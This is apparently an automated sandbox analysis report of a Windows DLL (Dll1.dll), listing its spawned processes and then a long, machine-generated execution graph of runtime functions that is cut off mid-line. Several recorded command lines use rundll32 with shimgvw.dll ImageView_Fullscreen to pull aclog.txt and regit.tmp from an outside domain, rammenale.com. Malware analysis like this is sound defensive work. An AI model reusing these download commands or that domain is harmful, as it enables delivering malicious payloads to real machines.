            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1
            Imagebase:0x790000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:3
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Users\user\Desktop\Dll1.dll,mydllmain
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:4
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe "C:\Users\user\Desktop\Dll1.dll",#1
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:5
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:6
            Start time:16:45:53
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:9
            Start time:16:45:54
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:10
            Start time:16:45:54
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:11
            Start time:16:45:56
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/aclog.txt
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:12
            Start time:16:45:57
            Start date:28/08/2024
            Path:C:\Windows\SysWOW64\rundll32.exe
            Wow64 process (32bit):true
            Commandline:rundll32.exe C:\Windows\System32\shimgvw.dll,ImageView_Fullscreen https://rammenale.com/for2/regit.tmp
            Imagebase:0x330000
            File size:61'440 bytes
            MD5 hash:889B99C52A60DD49227C5E485A016679
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:2.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:8.4%
              Total number of Nodes:2000
              Total number of Limit Nodes:33
              execution_graph 14998 6f9e5393 14999 6f9e53a1 ___except_validate_context_record 14998->14999 15009 6f9e4ae5 14999->15009 15002 6f9e53e6 15003 6f9e5404 15002->15003 15023 6f9e5748 15002->15023 15004 6f9e5471 15026 6f9e4e2a 15004->15026 15005 6f9e540c 15005->15003 15005->15004 15008 6f9e544c mydllmain 15005->15008 15008->15003 15010 6f9e4af3 CallUnexpected 28 API calls 15009->15010 15011 6f9e4aea 15010->15011 15012 6f9e4af2 15011->15012 15081 6f9f2ffb 15011->15081 15012->15002 15012->15003 15012->15005 15015 6f9ed0d1 15016 6f9ed0fa 15015->15016 15017 6f9ed0db IsProcessorFeaturePresent 15015->15017 15120 6f9ec846 15016->15120 15019 6f9ed0e7 15017->15019 15114 6f9ec07a 15019->15114 15141 6f9e5760 15023->15141 15025 6f9e575b 15025->15003 15031 6f9e4e4a __FrameHandler3::FrameUnwindToState 15026->15031 15027 6f9e515d 15028 6f9ed0c1 CallUnexpected 50 API calls 15027->15028 15040 6f9e5163 15027->15040 15029 6f9e51ce 15028->15029 15030 6f9e5132 15030->15027 15032 6f9e5130 15030->15032 15190 6f9e51cf 15030->15190 15031->15027 15033 6f9e4f2c 15031->15033 15034 6f9e4ae5 CallUnexpected 62 API calls 15031->15034 15036 6f9e4ae5 CallUnexpected 62 API calls 15032->15036 15033->15030 15035 6f9e4fb5 15033->15035 15079 6f9e4f32 type_info::operator== 15033->15079 15038 6f9e4eac 15034->15038 15039 6f9e50cc 15035->15039 15171 6f9e3b1f 15035->15171 15036->15027 15038->15040 15043 6f9e4ae5 CallUnexpected 62 API calls 15038->15043 15042 6f9e50e0 15039->15042 15186 6f9e462a 15039->15186 15040->15003 15042->15032 15045 6f9e50fc 15042->15045 15047 6f9e5106 15042->15047 15048 6f9e5121 15042->15048 15046 6f9e4eba 15043->15046 15045->15032 15045->15047 15049 6f9e4ae5 CallUnexpected 62 API calls 15046->15049 15050 6f9e4ae5 CallUnexpected 62 API calls 15047->15050 15051 6f9e5848 __InternalCxxFrameHandler 50 API calls 15048->15051 15058 6f9e4ec2 15049->15058 15052 6f9e5111 15050->15052 15053 6f9e512a 15051->15053 15054 6f9e4ae5 CallUnexpected 62 API calls 15052->15054 15053->15032 15055 6f9e518d 15053->15055 15054->15079 15057 6f9e4ae5 CallUnexpected 62 API calls 15055->15057 15056 6f9e4ae5 CallUnexpected 62 API calls 15059 6f9e4f0b 15056->15059 15060 6f9e5192 15057->15060 15058->15027 15058->15056 15059->15033 15064 6f9e4ae5 CallUnexpected 62 API calls 15059->15064 15061 6f9e4ae5 CallUnexpected 62 API calls 15060->15061 15065 6f9e519a 15061->15065 15063 6f9e4fd6 ___TypeMatch 15063->15039 15176 6f9e4daa 15063->15176 15067 6f9e4f15 15064->15067 15215 6f9e3d0b RtlUnwind 15065->15215 15066 6f9e516d 15068 6f9e462a __InternalCxxFrameHandler mydllmain 15066->15068 15069 6f9e4ae5 CallUnexpected 62 API calls 15067->15069 15072 6f9e5175 __InternalCxxFrameHandler 15068->15072 15073 6f9e4f20 15069->15073 15077 6f9e47d6 CallUnexpected 2 API calls 15072->15077 15166 6f9e5848 15073->15166 15074 6f9e51ae 15076 6f9e5748 __InternalCxxFrameHandler 62 API calls 15074->15076 15078 6f9e51ba __InternalCxxFrameHandler 15076->15078 15077->15055 15216 6f9e56bf 15078->15216 15079->15066 15207 6f9ed085 15079->15207 15123 6f9f2f29 15081->15123 15084 6f9f3040 15085 6f9f304c __FrameHandler3::FrameUnwindToState 15084->15085 15086 6f9ed968 __dosmaperr 17 API calls 15085->15086 15087 6f9f309c 15085->15087 15088 6f9f30ae CallUnexpected 15085->15088 15093 6f9f307d CallUnexpected 15085->15093 15086->15093 15089 6f9ee7b1 __dosmaperr 17 API calls 15087->15089 15090 6f9f30e4 CallUnexpected 15088->15090 15134 6f9f189f EnterCriticalSection 15088->15134 15091 6f9f30a1 15089->15091 15096 6f9f321e 15090->15096 15097 6f9f3121 15090->15097 15111 6f9f314f 15090->15111 15094 6f9ec276 __fread_nolock 48 API calls 15091->15094 15093->15087 15093->15088 15113 6f9f3086 15093->15113 15094->15113 15099 6f9f3229 15096->15099 15139 6f9f18e7 LeaveCriticalSection 15096->15139 15105 6f9ed817 _unexpected 48 API calls 15097->15105 15097->15111 15100 6f9ec846 CallUnexpected 29 API calls 15099->15100 15102 6f9f3231 15100->15102 15103 6f9f319f 15107 6f9ed817 _unexpected 48 API calls 15103->15107 15104 6f9f31da mydllmain 15109 6f9f31b5 15104->15109 15106 6f9f3144 15105->15106 15108 6f9ed817 _unexpected 48 API calls 15106->15108 15110 6f9f31a4 mydllmain 15107->15110 15108->15111 15112 6f9ed817 _unexpected 48 API calls 15109->15112 15109->15113 15110->15109 15135 6f9f31ca 15111->15135 15112->15113 15113->15015 15115 6f9ec096 __fread_nolock CallUnexpected 15114->15115 15116 6f9ec0c2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15115->15116 15117 6f9ec193 CallUnexpected 15116->15117 15118 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15117->15118 15119 6f9ec1b1 15118->15119 15119->15016 15121 6f9ec683 CallUnexpected 29 API calls 15120->15121 15122 6f9ec857 15121->15122 15124 6f9f2f35 __FrameHandler3::FrameUnwindToState 15123->15124 15129 6f9f189f EnterCriticalSection 15124->15129 15126 6f9f2f43 15130 6f9f2f85 15126->15130 15129->15126 15133 6f9f18e7 LeaveCriticalSection 15130->15133 15132 6f9ed0c6 15132->15015 15132->15084 15133->15132 15134->15090 15136 6f9f31ce 15135->15136 15137 6f9f3196 15135->15137 15140 6f9f18e7 LeaveCriticalSection 15136->15140 15137->15103 15137->15104 15137->15113 15139->15099 15140->15137 15142 6f9e576c __FrameHandler3::FrameUnwindToState 15141->15142 15143 6f9e4ae5 CallUnexpected 62 API calls 15142->15143 15149 6f9e5787 __CallSettingFrame@12 __FrameHandler3::FrameUnwindToState 15143->15149 15145 6f9e5807 15147 6f9e580c __FrameHandler3::FrameUnwindToState 15145->15147 15155 6f9ed0c1 15145->15155 15147->15025 15149->15145 15150 6f9e582e 15149->15150 15151 6f9e4ae5 CallUnexpected 62 API calls 15150->15151 15152 6f9e5833 15151->15152 15153 6f9e583e 15152->15153 15154 6f9e4ae5 CallUnexpected 62 API calls 15152->15154 15153->15145 15154->15153 15156 6f9f2ffb CallUnexpected 2 API calls 15155->15156 15157 6f9ed0c6 15156->15157 15158 6f9ed0d1 15157->15158 15160 6f9f3040 CallUnexpected 49 API calls 15157->15160 15159 6f9ed0db IsProcessorFeaturePresent 15158->15159 15165 6f9ed0fa 15158->15165 15161 6f9ed0e7 15159->15161 15160->15158 15163 6f9ec07a CallUnexpected 8 API calls 15161->15163 15162 6f9ec846 CallUnexpected 29 API calls 15164 6f9ed104 15162->15164 15163->15165 15165->15162 15167 6f9e58dc 15166->15167 15170 6f9e585c ___TypeMatch 15166->15170 15168 6f9ed0c1 CallUnexpected 50 API calls 15167->15168 15169 6f9e58e1 15168->15169 15170->15033 15172 6f9e3b3b 15171->15172 15173 6f9e3b72 15172->15173 15174 6f9ed0c1 CallUnexpected 50 API calls 15172->15174 15173->15063 15175 6f9e3b8d 15174->15175 15177 6f9e4dc9 15176->15177 15178 6f9e4dbc 15176->15178 15232 6f9e3d0b RtlUnwind 15177->15232 15228 6f9e4d11 15178->15228 15181 6f9e4dde 15182 6f9e5760 __FrameHandler3::FrameUnwindToState 62 API calls 15181->15182 15183 6f9e4def __FrameHandler3::FrameUnwindToState 15182->15183 15233 6f9e54f0 15183->15233 15185 6f9e4e17 __InternalCxxFrameHandler 15185->15063 15188 6f9e4636 __FrameHandler3::FrameUnwindToState 15186->15188 15187 6f9e4674 __InternalCxxFrameHandler 15187->15042 15188->15187 15189 6f9e46ab mydllmain 15188->15189 15189->15187 15191 6f9e52fa 15190->15191 15192 6f9e51e5 15190->15192 15191->15032 15193 6f9e4ae5 CallUnexpected 62 API calls 15192->15193 15194 6f9e51ec 15193->15194 15195 6f9e51f3 EncodePointer 15194->15195 15204 6f9e522e 15194->15204 15198 6f9e4ae5 CallUnexpected 62 API calls 15195->15198 15196 6f9e52ff 15199 6f9ed0c1 CallUnexpected 50 API calls 15196->15199 15197 6f9e524b 15200 6f9e3b1f __InternalCxxFrameHandler 50 API calls 15197->15200 15202 6f9e5201 15198->15202 15201 6f9e5304 15199->15201 15205 6f9e5262 15200->15205 15203 6f9e3beb __InternalCxxFrameHandler 62 API calls 15202->15203 15202->15204 15203->15204 15204->15191 15204->15196 15204->15197 15205->15191 15206 6f9e4daa __InternalCxxFrameHandler 65 API calls 15205->15206 15206->15205 15208 6f9ed091 __FrameHandler3::FrameUnwindToState 15207->15208 15209 6f9ed817 _unexpected 50 API calls 15208->15209 15210 6f9ed096 15209->15210 15211 6f9ed09d mydllmain 15210->15211 15212 6f9ed0ab 15210->15212 15211->15212 15213 6f9ed0c1 CallUnexpected 50 API calls 15212->15213 15214 6f9ed0c0 15213->15214 15215->15074 15217 6f9e56cb __EH_prolog3_catch 15216->15217 15218 6f9e4ae5 CallUnexpected 62 API calls 15217->15218 15219 6f9e56d0 15218->15219 15220 6f9e56f3 15219->15220 15294 6f9e5d83 15219->15294 15222 6f9ed0c1 CallUnexpected 50 API calls 15220->15222 15224 6f9e56f8 15222->15224 15229 6f9e4d1d __FrameHandler3::FrameUnwindToState 15228->15229 15247 6f9e4bd3 15229->15247 15231 6f9e4d45 __InternalCxxFrameHandler ___AdjustPointer 15231->15177 15232->15181 15234 6f9e54fc __FrameHandler3::FrameUnwindToState 15233->15234 15253 6f9e3d8f 15234->15253 15237 6f9e4ae5 CallUnexpected 62 API calls 15238 6f9e5528 15237->15238 15239 6f9e4ae5 CallUnexpected 62 API calls 15238->15239 15240 6f9e5533 15239->15240 15241 6f9e4ae5 CallUnexpected 62 API calls 15240->15241 15242 6f9e553e 15241->15242 15243 6f9e4ae5 CallUnexpected 62 API calls 15242->15243 15244 6f9e5546 __InternalCxxFrameHandler 15243->15244 15258 6f9e5643 15244->15258 15250 6f9e4bdf __FrameHandler3::FrameUnwindToState 15247->15250 15248 6f9ed0c1 CallUnexpected 50 API calls 15249 6f9e4d10 15248->15249 15251 6f9e4c30 mydllmain 15250->15251 15252 6f9e4c3b __fread_nolock ___AdjustPointer 15250->15252 15251->15252 15252->15231 15252->15248 15254 6f9e4ae5 CallUnexpected 62 API calls 15253->15254 15255 6f9e3da0 15254->15255 15256 6f9e4ae5 CallUnexpected 62 API calls 15255->15256 15257 6f9e3dab 15256->15257 15257->15237 15269 6f9e3db3 15258->15269 15260 6f9e5654 15261 6f9e4ae5 CallUnexpected 62 API calls 15260->15261 15262 6f9e565a 15261->15262 15263 6f9e4ae5 CallUnexpected 62 API calls 15262->15263 15265 6f9e5665 15263->15265 15264 6f9e562b 15264->15185 15265->15264 15286 6f9e4730 15265->15286 15268 6f9e462a __InternalCxxFrameHandler mydllmain 15268->15264 15270 6f9e4ae5 CallUnexpected 62 API calls 15269->15270 15271 6f9e3dbc 15270->15271 15272 6f9e3dc4 15271->15272 15273 6f9e3dd2 15271->15273 15274 6f9e4ae5 CallUnexpected 62 API calls 15272->15274 15275 6f9e4ae5 CallUnexpected 62 API calls 15273->15275 15276 6f9e3dcc 15274->15276 15277 6f9e3dd7 15275->15277 15276->15260 15277->15276 15278 6f9ed0c1 CallUnexpected 50 API calls 15277->15278 15279 6f9e3dfa 15278->15279 15280 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15279->15280 15282 6f9e3e0f ___CxxFrameHandler 15280->15282 15281 6f9e3e1a 15281->15260 15282->15281 15283 6f9e3e69 15282->15283 15289 6f9e3d0b RtlUnwind 15282->15289 15290 6f9e3beb 15283->15290 15287 6f9e4ae5 CallUnexpected 62 API calls 15286->15287 15288 6f9e4738 15287->15288 15288->15264 15288->15268 15289->15283 15291 6f9e3c0d __InternalCxxFrameHandler 15290->15291 15293 6f9e3bfb 15290->15293 15292 6f9e4ae5 CallUnexpected 62 API calls 15291->15292 15292->15293 15293->15281 15295 6f9e4ae5 CallUnexpected 62 API calls 15294->15295 15296 6f9e5d89 15295->15296 15297 6f9e5d9a 15296->15297 15298 6f9e5d90 mydllmain 15296->15298 15299 6f9ed085 _unexpected 51 API calls 15297->15299 15298->15297 15300 6f9e5d9f 15299->15300 15343 6f9f2e87 15344 6f9f2eed 15343->15344 15347 6f9f2ea0 15343->15347 15345 6f9f2ea8 mydllmain 15349 6f9ee5d8 2 API calls 15345->15349 15350 6f9ee688 56 API calls 15345->15350 15346 6f9f2ebe 15346->15344 15348 6f9f2ed6 mydllmain 15346->15348 15347->15345 15347->15346 15348->15346 15349->15347 15350->15347 15361 6f9eaf81 15362 6f9f01a6 ___scrt_uninitialize_crt 79 API calls 15361->15362 15363 6f9eaf89 15362->15363 15371 6f9efe54 15363->15371 15365 6f9eaf8e 15366 6f9f01af __DllMainCRTStartup@12 17 API calls 15365->15366 15367 6f9eaf9d DeleteCriticalSection 15366->15367 15367->15365 15368 6f9eafb8 15367->15368 15369 6f9ee7c4 ___free_lconv_mon 17 API calls 15368->15369 15370 6f9eafc3 15369->15370 15372 6f9efe60 __FrameHandler3::FrameUnwindToState 15371->15372 15381 6f9f189f EnterCriticalSection 15372->15381 15374 6f9efed7 15382 6f9efef6 15374->15382 15376 6f9efe6b 15376->15374 15378 6f9efeab DeleteCriticalSection 15376->15378 15380 6f9eb217 __DllMainCRTStartup@12 80 API calls 15376->15380 15379 6f9ee7c4 ___free_lconv_mon 17 API calls 15378->15379 15379->15376 15380->15376 15381->15376 15385 6f9f18e7 LeaveCriticalSection 15382->15385 15384 6f9efee3 15384->15365 15385->15384 12829 6f9e2eb9 12830 6f9e2ef7 12829->12830 12831 6f9e2ec4 12829->12831 12876 6f9e3013 12830->12876 12833 6f9e2ee9 12831->12833 12834 6f9e2ec9 12831->12834 12841 6f9e2f0c 12833->12841 12836 6f9e2ece 12834->12836 12837 6f9e2edf 12834->12837 12840 6f9e2ed3 12836->12840 12863 6f9e3531 12836->12863 12868 6f9e3512 12837->12868 12842 6f9e2f18 __FrameHandler3::FrameUnwindToState 12841->12842 12905 6f9e35a2 12842->12905 12844 6f9e2fe1 12844->12840 12845 6f9e2f1f __DllMainCRTStartup@12 12845->12844 12846 6f9e300b 12845->12846 12847 6f9e2f46 12845->12847 12936 6f9e3741 IsProcessorFeaturePresent 12846->12936 12916 6f9e3504 12847->12916 12850 6f9e3012 12855 6f9e2f63 12924 6f9ec3ba 12855->12924 12856 6f9e2f95 ___scrt_is_nonwritable_in_current_image 12856->12844 12859 6f9e2fcd mydllmain 12856->12859 12859->12844 12861 6f9e2f82 12861->12856 12932 6f9ec38f 12861->12932 13229 6f9ed03b 12863->13229 13436 6f9e4a6c 12868->13436 12873 6f9e352e 12873->12840 12874 6f9e4a77 26 API calls 12875 6f9e351b 12874->12875 12875->12840 12878 6f9e301f __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 12876->12878 12877 6f9e3028 12877->12840 12878->12877 12879 6f9e30bb 12878->12879 12880 6f9e3050 12878->12880 12881 6f9e3741 __DllMainCRTStartup@12 4 API calls 12879->12881 13456 6f9e3572 12880->13456 12886 6f9e30c2 __FrameHandler3::FrameUnwindToState 12881->12886 12883 6f9e3055 13465 6f9e3434 12883->13465 12889 6f9e30f8 dllmain_raw 12886->12889 12890 6f9e30f3 12886->12890 12902 6f9e30de 12886->12902 12888 6f9e305f __DllMainCRTStartup@12 13472 6f9e3713 12888->13472 12891 6f9e3112 dllmain_crt_dispatch 12889->12891 12889->12902 13481 6f9e1000 12890->13481 12891->12890 12891->12902 12897 6f9e3164 12898 6f9e316d dllmain_crt_dispatch 12897->12898 12897->12902 12899 6f9e3180 dllmain_raw 12898->12899 12898->12902 12899->12902 12900 6f9e1000 __DllMainCRTStartup@12 148 API calls 12901 6f9e314b 12900->12901 12903 6f9e3013 __DllMainCRTStartup@12 167 API calls 12901->12903 12902->12840 12904 6f9e3159 dllmain_raw 12903->12904 12904->12897 12906 6f9e35ab 12905->12906 12940 6f9e393b IsProcessorFeaturePresent 12906->12940 12910 6f9e35bc 12911 6f9e35c0 12910->12911 12950 6f9ed01e 12910->12950 12911->12845 12914 6f9e35d7 12914->12845 13223 6f9e35db 12916->13223 12918 6f9e2f55 12918->12856 12919 6f9e385e 12918->12919 12920 6f9e386e 12919->12920 12921 6f9e2f5e 12919->12921 12920->12921 12922 6f9e3875 mydllmain 12920->12922 12923 6f9e3428 InitializeSListHead 12921->12923 12922->12920 12923->12855 12925 6f9ec3c6 12924->12925 12926 6f9e2f77 12925->12926 12927 6f9ec3cc mydllmain 12925->12927 12926->12856 12928 6f9e34d9 12926->12928 12927->12925 12929 6f9e34de ___scrt_release_startup_lock 12928->12929 12930 6f9e393b IsProcessorFeaturePresent 12929->12930 12931 6f9e34e7 12929->12931 12930->12931 12931->12861 12933 6f9ec39d 12932->12933 12934 6f9ec3b6 12932->12934 12933->12934 12935 6f9ec3a4 mydllmain 12933->12935 12934->12856 12935->12933 12937 6f9e3757 __fread_nolock CallUnexpected 12936->12937 12938 6f9e3802 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 12937->12938 12939 6f9e3846 CallUnexpected 12938->12939 12939->12850 12941 6f9e35b7 12940->12941 12942 6f9e4a4d 12941->12942 12959 6f9e5af7 12942->12959 12945 6f9e4a56 12945->12910 12947 6f9e4a5e 12948 6f9e4a69 12947->12948 12973 6f9e5b33 12947->12973 12948->12910 13017 6f9f2e90 12950->13017 12953 6f9e4a7f 12954 6f9e4a88 12953->12954 12955 6f9e4a92 12953->12955 12956 6f9e4bb8 ___vcrt_uninitialize_ptd 7 API calls 12954->12956 12955->12911 12957 6f9e4a8d 12956->12957 12958 6f9e5b33 ___vcrt_uninitialize_locks DeleteCriticalSection 12957->12958 12958->12955 12960 6f9e5b00 12959->12960 12962 6f9e5b29 12960->12962 12963 6f9e4a52 12960->12963 12977 6f9e5d3c 12960->12977 12964 6f9e5b33 ___vcrt_uninitialize_locks DeleteCriticalSection 12962->12964 12963->12945 12965 6f9e4b85 12963->12965 12964->12963 12995 6f9e5c4d 12965->12995 12970 6f9e4bb5 12970->12947 12972 6f9e4b9a 12972->12947 12974 6f9e5b5d 12973->12974 12975 6f9e5b3e 12973->12975 12974->12945 12976 6f9e5b48 DeleteCriticalSection 12975->12976 12976->12974 12976->12976 12983 6f9e5b62 12977->12983 12980 6f9e5d5f mydllmain 12982 6f9e5d72 12980->12982 12981 6f9e5d74 InitializeCriticalSectionAndSpinCount 12981->12982 12982->12960 12984 6f9e5b83 12983->12984 12985 6f9e5b7f 12983->12985 12984->12985 12986 6f9e5beb GetProcAddress 12984->12986 12988 6f9e5bdc 12984->12988 12990 6f9e5c02 LoadLibraryExW 12984->12990 12985->12980 12985->12981 12986->12985 12988->12986 12989 6f9e5be4 FreeLibrary 12988->12989 12989->12986 12991 6f9e5c49 12990->12991 12992 6f9e5c19 GetLastError 12990->12992 12991->12984 12992->12991 12993 6f9e5c24 ___vcrt_FlsGetValue 12992->12993 12993->12991 12994 6f9e5c3a LoadLibraryExW 12993->12994 12994->12984 12996 6f9e5b62 ___vcrt_FlsGetValue 5 API calls 12995->12996 12997 6f9e5c67 12996->12997 12998 6f9e5c80 TlsAlloc 12997->12998 12999 6f9e5c70 mydllmain 12997->12999 13000 6f9e4b8f 12999->13000 13000->12972 13001 6f9e5cfe 13000->13001 13002 6f9e5b62 ___vcrt_FlsGetValue 5 API calls 13001->13002 13003 6f9e5d18 13002->13003 13004 6f9e5d27 mydllmain 13003->13004 13005 6f9e5d33 TlsSetValue 13003->13005 13006 6f9e4ba8 13004->13006 13005->13006 13006->12970 13007 6f9e4bb8 13006->13007 13008 6f9e4bc2 13007->13008 13009 6f9e4bc8 13007->13009 13011 6f9e5c88 13008->13011 13009->12972 13012 6f9e5b62 ___vcrt_FlsGetValue 5 API calls 13011->13012 13013 6f9e5ca2 13012->13013 13014 6f9e5cae mydllmain 13013->13014 13015 6f9e5cba TlsFree 13013->13015 13016 6f9e5cb8 13014->13016 13015->13016 13016->13009 13018 6f9e35c9 13017->13018 13021 6f9f2ea0 13017->13021 13018->12914 13018->12953 13019 6f9f2ea8 mydllmain 13025 6f9ee688 13019->13025 13037 6f9ee5d8 13019->13037 13020 6f9f2ebe 13020->13018 13022 6f9f2ed6 mydllmain 13020->13022 13021->13019 13021->13020 13022->13020 13026 6f9ee694 __FrameHandler3::FrameUnwindToState 13025->13026 13042 6f9f189f EnterCriticalSection 13026->13042 13028 6f9ee69b 13043 6f9f3344 13028->13043 13031 6f9ee6b9 13062 6f9ee6df 13031->13062 13036 6f9ee5d8 2 API calls 13036->13031 13041 6f9ee5df 13037->13041 13038 6f9ee622 GetStdHandle 13038->13041 13039 6f9ee684 13039->13021 13040 6f9ee635 GetFileType 13040->13041 13041->13038 13041->13039 13041->13040 13042->13028 13044 6f9f3350 __FrameHandler3::FrameUnwindToState 13043->13044 13045 6f9f337a 13044->13045 13046 6f9f3359 13044->13046 13065 6f9f189f EnterCriticalSection 13045->13065 13073 6f9ee7b1 13046->13073 13050 6f9f3386 13055 6f9f33b2 13050->13055 13066 6f9f3294 13050->13066 13078 6f9f33d9 13055->13078 13056 6f9ee522 GetStartupInfoW 13057 6f9ee53f 13056->13057 13058 6f9ee5d3 13056->13058 13057->13058 13059 6f9f3344 52 API calls 13057->13059 13058->13036 13060 6f9ee567 13059->13060 13060->13058 13061 6f9ee597 GetFileType 13060->13061 13061->13060 13222 6f9f18e7 LeaveCriticalSection 13062->13222 13064 6f9ee6ca 13064->13021 13065->13050 13081 6f9ef9d8 13066->13081 13068 6f9f32a6 13072 6f9f32b3 13068->13072 13088 6f9efd31 13068->13088 13094 6f9ee7c4 13072->13094 13125 6f9ed968 GetLastError 13073->13125 13075 6f9ee7b6 13076 6f9ec276 13075->13076 13179 6f9ec1c2 13076->13179 13221 6f9f18e7 LeaveCriticalSection 13078->13221 13080 6f9ee6aa 13080->13031 13080->13056 13086 6f9ef9e5 __dosmaperr 13081->13086 13082 6f9efa25 13085 6f9ee7b1 __dosmaperr 16 API calls 13082->13085 13083 6f9efa10 RtlAllocateHeap 13084 6f9efa23 13083->13084 13083->13086 13084->13068 13085->13084 13086->13082 13086->13083 13100 6f9ec30c 13086->13100 13111 6f9efb4e 13088->13111 13090 6f9efd4d 13091 6f9efd6b InitializeCriticalSectionAndSpinCount 13090->13091 13092 6f9efd56 mydllmain 13090->13092 13093 6f9efd69 13091->13093 13092->13093 13093->13068 13095 6f9ee7cf HeapFree 13094->13095 13096 6f9ee7f9 13094->13096 13095->13096 13097 6f9ee7e4 GetLastError 13095->13097 13096->13050 13098 6f9ee7f1 __dosmaperr 13097->13098 13099 6f9ee7b1 __dosmaperr 15 API calls 13098->13099 13099->13096 13105 6f9ec338 13100->13105 13103 6f9ec31d mydllmain 13104 6f9ec32a 13103->13104 13104->13086 13106 6f9ec344 __FrameHandler3::FrameUnwindToState 13105->13106 13107 6f9f189f CallUnexpected EnterCriticalSection 13106->13107 13108 6f9ec34f CallUnexpected 13107->13108 13109 6f9ec386 __dosmaperr LeaveCriticalSection 13108->13109 13110 6f9ec317 13109->13110 13110->13103 13110->13104 13112 6f9efb7e 13111->13112 13116 6f9efb7a __dosmaperr 13111->13116 13112->13116 13117 6f9efa83 13112->13117 13115 6f9efb98 GetProcAddress 13115->13116 13116->13090 13123 6f9efa94 ___vcrt_FlsGetValue 13117->13123 13118 6f9efb2a 13118->13115 13118->13116 13119 6f9efab2 LoadLibraryExW 13120 6f9efacd GetLastError 13119->13120 13121 6f9efb31 13119->13121 13120->13123 13121->13118 13122 6f9efb43 FreeLibrary 13121->13122 13122->13118 13123->13118 13123->13119 13124 6f9efb00 LoadLibraryExW 13123->13124 13124->13121 13124->13123 13126 6f9ed97e 13125->13126 13127 6f9ed984 13125->13127 13148 6f9efcb0 13126->13148 13131 6f9ed988 SetLastError 13127->13131 13154 6f9efcef 13127->13154 13131->13075 13133 6f9ef9d8 __dosmaperr 15 API calls 13134 6f9ed9b5 13133->13134 13135 6f9ed9ce 13134->13135 13136 6f9ed9bd 13134->13136 13138 6f9efcef __dosmaperr 7 API calls 13135->13138 13137 6f9efcef __dosmaperr 7 API calls 13136->13137 13142 6f9ed9cb 13137->13142 13139 6f9ed9da 13138->13139 13140 6f9ed9de 13139->13140 13141 6f9ed9f5 13139->13141 13143 6f9efcef __dosmaperr 7 API calls 13140->13143 13160 6f9ed619 13141->13160 13144 6f9ee7c4 ___free_lconv_mon 15 API calls 13142->13144 13143->13142 13144->13131 13147 6f9ee7c4 ___free_lconv_mon 15 API calls 13147->13131 13149 6f9efb4e __dosmaperr 5 API calls 13148->13149 13150 6f9efccc 13149->13150 13151 6f9efce7 TlsGetValue 13150->13151 13152 6f9efcd5 mydllmain 13150->13152 13153 6f9efce2 13152->13153 13153->13127 13155 6f9efb4e __dosmaperr 5 API calls 13154->13155 13156 6f9efd0b 13155->13156 13157 6f9efd29 TlsSetValue 13156->13157 13158 6f9efd14 mydllmain 13156->13158 13159 6f9ed9a0 13158->13159 13159->13131 13159->13133 13165 6f9ed4ad 13160->13165 13166 